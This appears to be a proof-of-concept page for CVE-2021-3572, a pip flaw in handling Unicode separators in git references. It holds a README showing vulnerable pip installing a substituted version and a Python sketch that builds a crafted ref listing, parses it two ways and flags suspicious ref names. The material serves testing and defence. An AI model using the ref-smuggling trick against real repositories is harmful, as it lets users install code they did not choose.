CVE-2021-3572 PoC: pip input validation error vulnerability

Associated Vulnerability
Title: pip input validation error vulnerability (CVE-2021-3572)
Description: A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.
Description
A simple repository helping to test CVE-2021-3572 in PyPA/pip
Readme
# CVE-2021-3572

This repository is designed for testing CVE-2021-3572 in [pypa/pip](https://github.com/pypa/pip).

For more information, see these resources:
* CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572
* PR where vulnerability was fixed: https://github.com/pypa/pip/pull/9827
* Issue with more discussion: https://github.com/pypa/pip/issues/10042

Also, see the tags and first two commits in this repository.

## Testing

A vulnerable version of pip (<21.1) installs version 9999.0, while a fixed version installs the correct version 1.0:

### Vulnerable version

```
$ pip install "pip<21.1"
Successfully installed pip-21.0.1

$ pip install git+https://github.com/frenzymadness/CVE-2021-3572.git@original_version

$ pip list
Package       Version
------------- -------
cve-2021-3572 9999.0
pip           21.0.1
setuptools    56.2.0
wheel         0.36.2
```

### Fixed version

```
$ pip install -U pip
Successfully installed pip-21.1.2

$ pip install git+https://github.com/frenzymadness/CVE-2021-3572.git@original_version

$ pip list
Package       Version
------------- -------
cve-2021-3572 1.0
pip           21.1.2
setuptools    56.2.0
wheel         0.36.2
```
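
The page does not show pip's parsing code, so the following is an added sketch (not code from pip or from this repository) of how Unicode-aware string splitting can misread a ref listing, next to a strict parser and a check that flags ref names worth reviewing. The record format, the commit ids and every ref name other than `original_version` are constructed assumptions.

```python
# Added example: not code from pip or from the CVE-2021-3572 test repository.
# Assumption: a ref listing holds "<sha> <refname>" records separated by "\n".

SHA_EXPECTED = "1" * 40  # constructed placeholder commit ids
SHA_OTHER = "2" * 40

# Constructed listing: the second ref name embeds U+2028 (LINE SEPARATOR) and
# U+2003 (EM SPACE); it is still a single "\n"-terminated record.
SAMPLE = (
    f"{SHA_EXPECTED} refs/tags/original_version\n"
    f"{SHA_OTHER} refs/tags/x\u2028{SHA_OTHER}\u2003refs/tags/original_version\n"
)


def parse_naive(output):
    """Unicode-aware splitting: one record can be read as several."""
    refs = {}
    for line in output.strip().splitlines():  # also breaks on U+2028, U+0085, ...
        sha, name = line.split()  # also breaks on any Unicode whitespace
        refs[name] = sha  # a later record overwrites an earlier one
    return refs


def parse_strict(output):
    """Split records on "\\n" only and fields on the first ASCII space only."""
    refs = {}
    for line in output.split("\n"):
        line = line.rstrip("\r")
        if not line:
            continue
        sha, sep, name = line.partition(" ")
        if not sep or not name:
            raise ValueError(f"unexpected ref line: {line!r}")
        refs[name] = sha
    return refs


def suspicious_ref_names(refs):
    """Ref names that str.splitlines() or str.split() would cut apart."""
    return [n for n in refs if len(n.splitlines()) != 1 or len(n.split()) != 1]


if __name__ == "__main__":
    wanted = "refs/tags/original_version"
    print("naive :", parse_naive(SAMPLE)[wanted])
    print("strict:", parse_strict(SAMPLE)[wanted])
    print("flagged:", [ascii(n) for n in suspicious_ref_names(parse_strict(SAMPLE))])
```

Running `suspicious_ref_names` over the strictly parsed refs of a repository before pinning to a tag or branch gives a quick review list, independent of the installed pip version.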
File Snapshot

```
[4.0K]  /data/pocs/5ef2e0b2f3e27cdaec7dd58ff5c6981759bd18c2
├── [  19]  cve_2021_3572.py
├── [1.0K]  LICENSE
├── [1.2K]  README.md
└── [ 377]  setup.py

0 directories, 4 files
```